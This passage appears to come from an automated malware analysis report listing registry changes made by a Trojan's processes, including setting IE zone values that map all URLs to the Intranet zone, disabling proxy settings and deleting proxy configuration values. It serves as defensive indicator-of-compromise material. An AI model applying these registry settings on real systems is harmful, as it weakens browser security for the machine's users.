"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9E 44 87 2E 28 E4 5B B9 56 2E 68 77 0B 3C C8 AB"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

The process %original file name%.exe:1076 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1F 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2F 79 97 D5 E6 D6 FF F2 0F 48 EB A0 9B 27 3A 5E"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1704 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4D 51 39 33 ED B3 CF 70 EB 00 6A 1C 73 B3 3E F1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4B DA 21 B9 45 74 85 75 F1 16 13 81 E9 62 BD 98"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:1980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"My Video" = ""

[HKLM\SOFTWARE\YTDownloader\Success]
"Install" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MaxConnectionsPerServer" = "2"
"MaxConnectionsPer1_0Server" = "2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\YTDownloader\Success]
"InstallStr" = "ok"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "9A 59 F2 B2 88 1A 83 9F 3C C2 CC D1 45 0B 24 9F"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:264 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "02 93 CF 2F D6 90 FB 6E 5F 90 8A 98 52 B8 B3 D4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process ins_sense.exe:2100 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 80 55 AF C3 0B E8 CD FA C9 F7 9E 2B B5 E4 37"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"9ba9693.exe" = "9ba9693"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process sc.exe:2344 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "54 90 E8 3D 34 A1 66 55 D1 1B 38 92 26 8C 80 5F"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"
"Favorites" = "%Documents and Settings%\%current user%\Favorites"

The process sc.exe:3936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Favorites" = "%Documents and Settings%\All Users\Favorites"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Video" = ""
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
"Common Startup" = "%Documents and Settings%\All Users\Start Menu\Programs\Startup"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Templates" = "%Documents and Settings%\%current user%\Templates"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Templates" = "%Documents and Settings%\All Users\Templates"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
